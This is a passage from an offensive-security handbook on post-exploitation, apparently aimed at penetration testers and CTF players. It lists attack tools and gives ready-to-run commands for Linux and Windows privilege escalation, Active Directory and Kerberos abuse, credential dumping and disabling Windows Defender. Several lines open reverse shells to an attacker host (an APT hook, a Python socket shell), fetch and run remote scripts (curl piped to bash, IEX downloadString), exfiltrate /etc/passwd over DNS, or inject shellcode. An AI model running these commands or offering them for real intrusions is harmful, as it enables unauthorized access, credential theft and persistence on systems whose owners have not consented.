description: >- Reference : https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/10_post_exploitation.md
Post Exploitation
Post Exploitation
Table of Contents
- accesschk
- ADCSTemplate
- Apache2
- AppLocker
- APT
- Bash
- Bash Debugging Mode
- BloodHound
- BloodHound Python
- Certify
- Certipy
- ClamAV
- Credentials File
- dd
- DNS
- enum4linux
- enum4linux-ng
- Evil-WinRM
- gdbus
- gem
- Git
- gMSADumper
- grep
- gsocket
- find
- functions
- Impacket
- Internet Information Service (IIS)
- JAWS
- Kerberos
- Krbrelayx
- LAPS
- LDAP
- ldapsearch
- LD_PRELOAD
- LD_LIBRARY_PATH
- Linux
- Linux Wildcards
- logrotten
- Lsass
- Lua
- machinectl
- Microsoft Windows
- Microsoft Windows Defender
- Minimalistic Offensive Security Tools
- PassTheCert
- Path Variable Hijacking
- pika
- Ping Sweep
- PKINITtools
- plotting
- Port Scanning
- PoshADCS
- powercat
- Powermad
- PowerShell Constrained Language Mode (CLM)
- PowerSploit
- PowerView
- PRET
- procdump
- pspy
- pth-toolkit
- pwncat
- Python
- rpcclient
- Rubeus
- RunasCs
- SeBackupPrivilege Privilege Escalation (diskshadow)
- setcap
- SharpHound
- Shell Upgrade
- Sherlock
- systemctl
- Time Stomping
- Universal Privilege Escalation and Persistence Printer
- User Group Exploitation
- VSS
- WDigest
- Whisker
- Windows-Exploit-Suggester
- winexe
- writeDACL
Resources
Name | Description | URL |
---|---|---|
ADCSKiller - An ADCS Exploitation Automation Tool | An ADCS Exploitation Automation Tool Weaponizing Certipy and Coercer | https://github.com/grimlockx/ADCSKiller |
ADCSTemplate | A PowerShell module for exporting, importing, removing, permissioning, publishing Active Directory Certificate Templates. It also includes a DSC resource for creating AD CS templates using these functions. This was built with the intent of using DSC for rapid lab builds. Could also work in production to move templates between AD CS environments. | https://github.com/GoateePFE/ADCSTemplate |
adPEAS | Powershell tool to automate Active Directory enumeration. | https://github.com/61106960/adPEAS |
BloodHound | BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. | https://github.com/BloodHoundAD/BloodHound |
BloodHound | Fork of BloodHound with PKI nodes and edges for Certipy along with some minor personal improvements | https://github.com/ly4k/BloodHound |
BloodHound Docker | BloodHound Docker Ready to Use | https://github.com/belane/docker-bloodhound |
BloodHound Python | BloodHound.py is a Python based ingestor for BloodHound, based on Impacket. | https://github.com/fox-it/BloodHound.py |
BloodyAD Framework | BloodyAD is an Active Directory Privilege Escalation Framework, it can be used manually using bloodyAD.py or automatically by combining pathgen.py and autobloody.py. | https://github.com/CravateRouge/bloodyAD |
Certify | Active Directory certificate abuse. | https://github.com/GhostPack/Certify |
Certipy | Tool for Active Directory Certificate Services enumeration and abuse | https://github.com/ly4k/Certipy |
check_vulnerabledrivers.ps1 | A quick script to check for vulnerable drivers. Compares drivers on system with list from loldrivers.io | https://gist.github.com/api0cradle/d52832e36aaf86d443b3b9f58d20c01d |
Coercer | A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 9 methods. | https://github.com/p0dalirius/Coercer |
CSExec (a C Sharp psexec implementation) | An implementation of PSExec in C# | https://github.com/malcomvetter/CSExec |
DLLSideloader | PowerShell script to generate "proxy" counterparts to easily perform DLL Sideloading | https://github.com/Flangvik/DLLSideloader |
dnsteal | This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests. | https://github.com/m57/dnsteal |
enum4linux | A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts. | https://github.com/CiscoCXSecurity/enum4linux |
enum4linux-ng | A next generation version of enum4linux. | https://github.com/cddmp/enum4linux-ng |
EvilTree | A python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. | https://github.com/t3l3machus/eviltree |
GhostPack-Compiled Binaries | Compiled Binaries for Ghostpack (.NET v4.0) | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries |
GTFOBins | GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. | https://gtfobins.github.io/ |
HEKATOMB | Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them. | https://github.com/Processus-Thief/HEKATOMB |
Impacket | Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. | https://github.com/fortra/impacket |
Impacket Static Binaries | Standalone binaries for Linux/Windows of Impacket's examples | https://github.com/ropnop/impacket\_static\_binaries |
JAWS | JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. | https://github.com/411Hall/JAWS |
KrbRelay | Framework for Kerberos relaying | https://github.com/cube0x0/KrbRelay |
KrbRelayUp | KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings). | https://github.com/Dec0ne/KrbRelayUp |
Krbrelayx | Kerberos unconstrained delegation abuse toolkit | https://github.com/dirkjanm/krbrelayx |
LAPSDumper | Dumping LAPS from Python | https://github.com/n00py/LAPSDumper |
LinEnum | Privilege Escalation Enumeration | https://github.com/rebootuser/LinEnum |
linWinPwn | linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks | https://github.com/lefayjey/linWinPwn |
LOLAPPS | LOLAPPS is a compendium of applications that can be used to carry out day-to-day exploitation. | https://lolapps-project.github.io/# |
LOLBAS | The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques. | https://lolbas-project.github.io/# |
LOLDrivers | Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass security controls and carry out attacks. The project helps security professionals stay informed and mitigate potential threats. | https://www.loldrivers.io |
LOOBins | Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in macOS binaries and how they can be used by threat actors for malicious purposes. | https://www.loobins.io |
lsassy | Python tool to remotely extract credentials on a set of hosts. | https://github.com/Hackndo/lsassy |
nanodump | LSASS dumper | https://github.com/helpsystems/nanodump |
NTLMRelay2Self | An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav). | https://github.com/med0x2e/NTLMRelay2Self |
Obfuscated SharpCollection | Attempt at Obfuscated version of SharpCollection | https://github.com/Flangvik/ObfuscatedSharpCollection |
PassTheCert | Proof-of-Concept tool to authenticate to an LDAP/S server with a certificate through Schannel | https://github.com/AlmondOffSec/PassTheCert |
PEASS-ng | Privilege Escalation Awesome Scripts SUITE new generation | https://github.com/carlospolop/PEASS-ng |
Ping Castle | Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework. | https://github.com/vletoux/pingcastle |
PKINITtools | Tools for Kerberos PKINIT and relaying to AD CS | https://github.com/dirkjanm/PKINITtools |
powercat | Netcat: The powershell version. | https://github.com/besimorhino/powercat |
Powermad | PowerShell MachineAccountQuota and DNS exploit tools | https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1 |
PowerSharpPack | Many useful offensive CSharp Projects wraped into Powershell for easy usage. | https://github.com/S3cur3Th1sSh1t/PowerSharpPack |
PowershellKerberos | Some scripts to abuse kerberos using Powershell | https://github.com/MzHmO/PowershellKerberos |
PowerShell-Suite | My musings with PowerShell | https://github.com/FuzzySecurity/PowerShell-Suite |
PowerSploit | PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. | https://github.com/PowerShellMafia/PowerSploit |
PowerUp | PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 |
PowerView | PowerView is a PowerShell tool to gain network situational awareness on Windows domains. | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 |
PowerView.py | PowerView alternative | https://github.com/aniqfakhrul/powerview.py |
PPLdump | Dump the memory of a PPL with a userland exploit | https://github.com/itm4n/PPLdump |
Priv2Admin | Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS. | https://github.com/gtworek/Priv2Admin |
PSPKIAudit | PowerShell toolkit for AD CS auditing based on the PSPKI toolkit. | https://github.com/GhostPack/PSPKIAudit |
pspy | pspy is a command line tool designed to snoop on processes without need for root permissions. | https://github.com/DominicBreuker/pspy |
pth-toolkit | A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems. | https://github.com/byt3bl33d3r/pth-toolkit |
pwncat | Post-Exploitation Platform | https://github.com/calebstewart/pwncat |
PyWhisker | Python version of the C# tool for "Shadow Credentials" attacks | https://github.com/ShutdownRepo/pywhisker |
Rubeus | Rubeus is a C# toolset for raw Kerberos interaction and abuses. | https://github.com/GhostPack/Rubeus |
RunasCs | RunasCs - Csharp and open version of windows builtin runas.exe | https://github.com/antonioCoco/RunasCs |
RustHound | Active Directory data collector for BloodHound written in rust. | https://github.com/OPENCYBER-FR/RustHound |
scavenger | scavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as "interesting" files containing sensitive information. | https://github.com/SpiderLabs/scavenger |
SCShell | Fileless lateral movement tool that relies on ChangeServiceConfigA to run command | https://github.com/Mr-Un1k0d3r/SCShell |
Seatbelt | Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. | https://github.com/GhostPack/Seatbelt |
SeBackupPrivilege | Use SE_BACKUP_NAME/SeBackupPrivilege to access objects you shouldn't have access to. | https://github.com/giuliano108/SeBackupPrivilege |
SharpCollection | Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines. | https://github.com/Flangvik/SharpCollection |
SharpEventPersist | Persistence by writing/reading shellcode from Event Log | https://github.com/improsec/SharpEventPersist |
SharpExfiltrate | Modular C# framework to exfiltrate loot over secure and trusted channels. | https://github.com/Flangvik/SharpExfiltrate |
SharpHound | C# Data Collector for BloodHound | https://github.com/BloodHoundAD/SharpHound |
SharpStay | .NET project for installing Persistence | https://github.com/0xthirteen/SharpStay |
Sharp-Suite | Also known by Microsoft as Knifecoat hot_pepper | https://github.com/FuzzySecurity/Sharp-Suite |
SharpView | C# implementation of harmj0y's PowerView | https://github.com/tevora-threat/SharpView |
Sherlock | PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. | https://github.com/rasta-mouse/Sherlock |
SMBeagle | SMBeagle - Fileshare auditing tool. | https://github.com/punk-security/smbeagle |
static-binaries | This repo contains a bunch of statically-linked binaries of various tools, along with the Dockerfiles / other build scripts that can be used to build them. | https://github.com/andrew-d/static-binaries |
SUDO_KILLER | A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo for linux privilege escalation. | https://github.com/TH3xACE/SUDO\_KILLER |
tickey | Tool to extract Kerberos tickets from Linux kernel keys. | https://github.com/TarlogicSecurity/tickey |
Villain | Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team. | https://github.com/t3l3machus/Villain |
WADComs | WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments. | https://wadcoms.github.io |
Watson | Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities. | https://github.com/rasta-mouse/Watson |
WESNG | WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. | https://github.com/bitsadmin/wesng |
Whisker | Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account. | https://github.com/eladshamir/Whisker |
Windows-privesc-check | Tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). | https://github.com/pentestmonkey/windows-privesc-check |
Windows Privilege Escalation Fundamentals | How-to Windows Privilege Escalation | https://www.fuzzysecurity.com/tutorials/16.html |
Windows Privilege Escalation | Windows privlege escalation methodology | https://github.com/frizb/Windows-Privilege-Escalation |
WinPwn | Automation for internal Windows Penetrationtest / AD-Security | https://github.com/S3cur3Th1sSh1t/WinPwn |
wmiexec-Pro | New generation of wmiexec.py | https://github.com/XiaoliChan/wmiexec-Pro |
accesschk
Checking File Permissions
C:\> .\accesschk.exe /accepteula -quvw "C:\PATH\TO\FILE\<FILE>.exe"
Checking Service Permissions
C:\> .\accesschk.exe /accepteula -uwcqv <USERNAME> daclsvc
Checking Path Permissions to find Unquoted Service Paths
C:\> .\accesschk.exe /accepteula -uwdq C:\
C:\> .\accesschk.exe /accepteula -uwdq "C:\Program Files\"
C:\> .\accesschk.exe /accepteula -uwdq "C:\Program Files\<UNQUOTED_SERVICE_PATH>"
Checking Registry Entries
C:\> .\accesschk.exe /accepteula -uvwqk <REGISTRY_KEY>
Apache2
Read first Line of a File with apache2 Binary
$ sudo /usr/sbin/apache2 -f <FILE>
AppLocker
Bypass List (Windows 10 Build 1803)
C:\Windows\Tasks
C:\Windows\Temp
C:\Windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
APT
$ echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f"};' > /etc/apt/apt.conf.d/<FILE>
Bash
SUID Privilege Escalation
$ cp /bin/bash .
$ chmod +s bash
$ bash -p
White Collar eval Arbitrary Code Execution
Example
#!/bin/bash
chmod +s /bin/bash
'a[$(/tmp/<FILE>.sh>&2)]+42' /tmp/<FILE>.sh
Bash Debugging Mode
- Bash <4.4
$ env -i SHELLOPTS=xtrace PS4='$(chmod +s /bin/bash)' /usr/local/bin/<BINARY>
BloodHound
Installation
$ pip install bloodhound
$ sudo apt-get install neo4j
$ sudo apt-get install bloodhound
Installing and starting Database
$ wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
$ sudo echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list
$ sudo apt-get update
$ sudo apt-get install apt-transport-https
$ sudo apt-get install neo4j
$ systemctl start neo4j
$ sudo neo4j start console
$ sudo bloodhound --no-sandbox
Alternatively
$ sudo npm install -g electron-packager
$ git clone https://github.com/BloodHoundAD/Bloodhound
$ cd BloodHound
$ npm install
$ npm run linuxbuild
$ cd BloodHound-linux-x64
$ sudo ./BloodHound --no-sandbox
Database Password Reset
ALTER USER neo4j SET PASSWORD '<PASSWORD>'
Custom Queries
Custom Query Location on macOS
/System/Volumes/Data/Users/<USERNAME>/Library/Application Support/bloodhound/
BloodHound Python
Build Docker Container
$ docker build -t bloodhound.py
Collection Method All
$ bloodhound-python -u <USERNAME> -p "<PASSWORD>" -d <DOMAIN> -gc <DOMAIN> -c all -ns <RHOST>
$ bloodhound-python -u <USERNAME> -p '<PASSWORD>' -d <DOMAIN> -dc <RHOST> -ns <RHOST> --dns-tcp -no-pass -c ALL --zip
LDAP Dumping
$ bloodhound-python -u <USERNAME> -p '<PASSWORD>' -ns <RHOST> -d <DOMAIN> -c All
Parsing
$ cat 20220629013701_users.json | jq | grep \"name\"
Certify
PS C:\> Certify find /vulnerable
PS C:\> Certify.exe find /vulnerable /currentuser
Certipy
Common Commands
$ certipy find -dc-ip <RHOST> -u <USERNAME>@<DOMAIN> -p <PASSWORD>
Certificate Handling
Account Creation
$ certipy account create -username <USERNAME>@<DOMAIN> -password <PASSWORD> -dc-ip <RHOST> -dns <DOMAIN_CONTROLLER_DNS_NAME> -user <COMPUTERNAME>
Authentication
$ certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN>
LDAP-Shell
$ certipy auth -pfx <FILE>.pfx -dc-ip <RHOST> -u <USERNAME> -domain <DOMAIN> -ldap-shell
# add_user <USERNAME>
# add_user_to_group <GROUP>
Certificate Forging
$ certipy template -username <USERNAME>@<DOMAIN> -password <PASSWORD> -template Web -dc-ip <RHOST> -save-old
Certificate Request
Run the following command twice because of a current issue with certipy
.
$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST>
$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN>
$ certipy req -username <USERNAME>@<DOMAIN> -password <PASSWORD> -ca <CA> -target <FQDN> -template <TEMPLATE> -dc-ip <RHOST> -upn <USERNAME>@<DOMAIN> -dns <FQDN> -debug
Start BloodHound Fork
$ ./BloodHound --disable-gpu-sandbox
ClamAV
File Replacement Privilege Escalation
- Vulnerable Version 1.0.0
$ clamscan --version
ClamAV 1.0.0/26853/Fri Mar 24 07:24:11 2023
Example
Create a custom authorized_keys
file to replace another one. Then create a custom database
with the hex value
of the string you want to parse for.
$ printf ssh | xxd -p
custom_malware.db
Malware=737368
Execution
$ clamscan --remove=yes /root/.ssh/authorized_keys -d custom_malware.db
$ clamscan authorized_keys --copy=/root/.ssh/ -d custom_malware.db
Credentials File
https://twitter.com/NinjaParanoid/status/1516442028963659777?t=g7ed0vt6ER8nS75qd-g0sQ\&s=09
C:\ rundll32 keymgr.dll, KRShowKeyMgr
dd
Execute Shellcode
$ dd of=/proc/$$/mem bs=1 seek=$(($(cut -d" " -f9</proc/$$/syscall))) if=<(base64 -d<<<utz+IUO+aRkSKL+t3uH+McCwqQ8F) conv=notrunc
DNS
Data Exfiltration
Extract /etc/passwd
$ perl -E 'qx^Cdig $_.$$.${\(rand)}.example.com^Cfor(unpack"H*",qx^?cat /etc/pas*^?)=~m^H(..)^Hgc'
^C, ^H, and ^? are the corresponding single ASCII values.
enum4linux
$ enum4linux -a <RHOST>
enum4linux-ng
$ enum4linux-ng -A <RHOST>
Excel
.csv Files Command Injection
If the file get's parsed on a Linux operationg system, commands can be injected to the rows.
$ echo '" --exec="\!/dev/shm/<FILE>"' >> /PATH/TO/FILE/<FILE>.csv
Evil-WinRM
$ evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
*Evil-WinRM* PS C:\> menu
Using Certificate and Private Key
$ evil-winrm -i <RHOST> -c /PATH/TO/CERTIFICATE/<CERTIFICATE>.crt -k /PATH/TO/PRIVATE/KEY/<KEY>.key -p -u -S
Deactivate Windows Defender
$ Set-MpPreference -DisableRealtimeMonitoring $true
PowerView.ps1
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
$ evil-winrm -i compatibility -u '<USERNAME>' -p '<PASSWORD>' -s .
*Evil-WinRM* PS C:\> menu
*Evil-WinRM* PS C:\> Bypass-4MSI
*Evil-WinRM* PS C:\> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\> $pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
*Evil-WinRM* PS C:\> $cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USERNAME>', $pass)
*Evil-WinRM* PS C:\> Add-DomainGroupMember -Identity 'Domain Admins' -Members '<USERNAME>' -Credential $cred
Check User
*Evil-WinRM* PS C:\> Get-DomainUser <USERNAME> -Credential $cred
Code Execution
*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { whoami; hostname }
Find a File
*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { gci -recurse C:\Users <FILE>.txt }
Read a File
*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { cat \path\to\file\<FILE>.txt }
Remove a User from a Group
*Evil-WinRM* PS C:\> Invoke-Command -Computer DC -Credential $cred -ScriptBlock { net group "Domain Admins" <USERNAME> /del }
find
Specific Size
$ find / -size 50M // find files with a size of 50MB
Modified Files
$ find / -mtime 10 // find modified files in the last 10 days
$ find / -atime 10 // find accessed files in the last 10 days
$ find / -cmin -60 // find files changed within the last 60 minutes
$ find / -amin -60 // find files accesses within the last 60 minutes
Passwords
$ find ./ -type f -exec grep --color=always -i -I 'password' {} \;
Group Permissions
$ find / -group <group> 2>/dev/null
User specific Files
$ find / -user <USERNAME> 2>/dev/null
$ find / -user <USERNAME> -ls 2>/dev/null
$ find / -user <USERNAME> 2>/dev/null | grep -v proc 2>/dev/null
$ find / -user <USERNAME> -ls 2>/dev/null | grep -v proc 2>/dev/null
SUID and SGID Files
$ find / -perm -4000 2>/dev/null
$ find / -perm -4000 2>/dev/null | xargs ls -la
$ find / -type f -user root -perm -4000 2>/dev/null
$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
functions
- Bash <4.2-048
$ function /usr/sbin/<BINARY> { /bin/bash -p; }
$ export -f /usr/sbin/<BINARY>
$ /usr/sbin/<BINARY>
gdbus
Privilege Escalation
https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/
$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/.ssh/authorized_keys /root/.ssh/authorized_keys true
gem
$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc
Git
Git apply (Malicious Patch) Privilege Escalation
Payload
diff --git a/x b/../../../home/<USERNAME>/.ssh/authorized_keys
new file mode 100400
index 0000000..a3d61a0
--- /dev/null
+++ b/../../../home/<USERNAME>/.ssh/authorized_keys
@@ -0,0 +1 @@
+<SSH_PUBLIC_KEY>
Execution
$ git apply patch --unsafe-paths
Git Attributes Privilege Escalation
https://git-scm.com/book/en/v2/Customizing-Git-Git-Attributes#filters\_b
Notice that I only found this within a CTF so far. The pre-requisites are git commit
get's executed via script
.
Payload
export RHOST="<LHOST>";export RPORT=<LPORT>;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Execution
$ git init
$ echo '*.c filter=indent' > .git/info/attributes
$ git config filter.indent.clean /tmp/<FILE>
$ sudo -u <USERNAME> git-commit.sh
gMSADumper
$ python3 gMSADumper.py -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -l dc.<DOMAIN>
grep
$ grep -R db_passwd
$ grep -roiE "password.{20}"
$ grep -oiE "password.{20}" /etc/*.conf
$ grep -v "^[#;]" /PATH/TO/FILE | grep -v "^$" // grep for passwords like "DBPassword:"
gsocket
Shell
$ bash -c "$(curl -fsSL gsocket.io/x)"
Impacket
$ impacket-smbserver local . -smb2support
$ impacket-reg <DOMAIN>/<USERNAME>:<PASSWORD:PASSWORD_HASH>@<RHOST> <ACTION> <ACTION>
$ impacket-services <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION>
$ impacket-netview <DOMAIN>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt
$ impacket-lookupsid <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-GetADUsers -all -dc-ip <RHOST> <DOMAIN>/
$ impacket-getST <DOMAIN>/<USERNAME>$ -spn WWW/<DOMAIN_CONTROLLER>.<DOMAIN> -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
$ impacket-rpcdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-samrdump <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-atexec -k -no-pass <DOMAIN>/Administrator@<DOMAIN_CONTROLLER>.<DOMAIN> 'type C:\PATH\TO\FILE\<FILE>'
impacket-smbclient
$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-smbclient <DOMAIN>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
$ impacket-smbclient -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass
impacket-getTGT
$ impacket-getTGT <DOMAIN>/<USERNAME>:<PASSWORD>
$ impacket-getTGT <DOMAIN>/<USERNAME> -dc-ip <DOMAIN> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c
impacket-GetNPUsers
$ impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
$ impacket-GetNPUsers <DOMAIN>/<USERNAME> -request -no-pass -dc-ip <RHOST>
$ impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format john -outputfile hashes
impacket-getUserSPNs / GetUserSPNs.py
$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-GetUserSPNs <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<DOMAIN> -no-pass -request
$ ./GetUserSPNs.py <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<DOMAIN> -no-pass -request
impacket-secretsdump
$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-secretsdump <DOMAIN>/<USERNAME>@<RHOST>
$ impacket-secretsdump -k <DOMAIN>/<USERNAME>@<RHOST>.<DOMAIN> -no-pass -debug
$ impacket-secretsdump -ntds ndts.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
$ impacket-secretsdump -dc-ip <RHOST> <DOMAIN>.LOCAL/svc_bes:<PASSWORD>@<RHOST>
$ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
impacket-psexec
$ impacket-psexec <USERNAME>@<RHOST>
$ impacket-psexec <DOMAIN>/administrator@<RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
impacket-ticketer
Requirements
- Valid User
- NTHASH
- Domain-SID
$ export KRB5CCNAME=<USERNAME>.ccache
$ impacket-ticketer -nthash C1929E1263DDFF6A2BCC6E053E705F78 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain <DOMAIN> -spn MSSQLSVC/<RHOST>.<DOMAIN> -user-id 500 Administrator
Fixing [-] exceptions must derive from BaseException
Issue
$ ./GetUserSPNs.py <DOMAIN>/<USERNAME>:<PASSWORD> -k -dc-ip <DOMAIN_CONTROLLER>.<DOMAIN> -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] exceptions must derive from BaseException
To fix it
241 if self.__doKerberos:
242 #target = self.getMachineName()
243 target = self.__kdcHost
dacledit.py
$ python3 dacledit.py <DOMAIN>/<USERNAME>:<PASSWORD> -k -target-dn 'DC=<DOMAIN>,DC=<DOMAIN>' -dc-ip <RHOST> -action read -principal '<USERNAME>' -target '<GROUP>' -debug
Fixing msada_guids Error
#from impacket.msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
from msada_guids import SCHEMA_OBJECTS, EXTENDED_RIGHTS
Then put the msada_guids.py
into the same directory as dacledit.py
https://github.com/Porchetta-Industries/CrackMapExec/blob/master/cme/helpers/msada\_guids.py
owneredit.py
$ python3 owneredit.py -k '<DOMAIN>/<USERNAME>:<PASSWORD>' -dc-ip <RHOST> -action write -new-owner '<USERNAME>' -target '<GROUP>' -debug
Internet Information Service (IIS)
Application Pool Credential Dumping
C:\Windows\System32\inetsrv>appcmd.exe list apppool /@:*
JAWS
PS C:\> IEX(New-Object Net.webclient).downloadString('http://<LHOST>:<LPORT>/jaws-enum.ps1')
Kerberos
Authentication
If a user wants to obtain access to resources within a Active Directory network, he must obtain a ticket through a 6-step
process.
- User sends a request to the
Kerberos Distribution Center (KDC)
with his password hash and a timestamp. (AS-REQ) - If the
password hash
of the user matches that for the user on theKDC
, the user receives aTicket Granting Ticket
encrypted and signed by thekrbtgt
account. (AS-REP) - The
TGT
, including thekrbtgt hash
, is sent to theKDC
orDC
in order to recieve aKerberos Service Ticket (TGS)
. (TGS-REQ) - User then receives a
TGS
encrypted with thehash
of the service account he wishes to access. (TGS-REP) - User then connects to the server and attempts to use the service he sent the
initial request
for with theTGS
included. (AP-REQ) - User gains access and mutual authentication is given between the server and client if necessary (AP-REP).
Constrained Delegation
Constrained Delegation
limits the services to which a service can access on behalf of a user.- This service account must still be
trusted
todelegate
. - The user does
not authenticate
withKerberos
to theconstrained service
. - Instead of authenticating to the
KDC
first, like in a regular Kerberos ticket request, the user authenticatesdirectly to the service
. - Once the user authenticates to the service, the service then requests a
forwardable TGT
to theKDC
without the user's password included. - The
KDC
checks theTRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
attribute on the service and whether or not the user's account is blocked. - If everything checks out a ticket is returned.
- Ticket gets
passed back
to theKDC
and aTGS ticket
is requested to thesecond service
. KDC
checks themsDS-AllowedToDelegateTo
field on the second service and if it is listed, then anaccess ticket
is granted.TGS
gets sent to the next service and the user now can authenticate to it.
The Service for User (S4U)
extension is used to aid the impersonation process when Constrained Delegation
is used. The extension has two extensions within it:
Service for User to Self (S4U2Self)
: This allows a service to obtain aforwardable TGS
to itself on the user's behalf with theUser Principal Name
supplied. No password is included.Service for User to Proxy (S4U2proxy)
: This allows the service toobtain
the requiredTGS
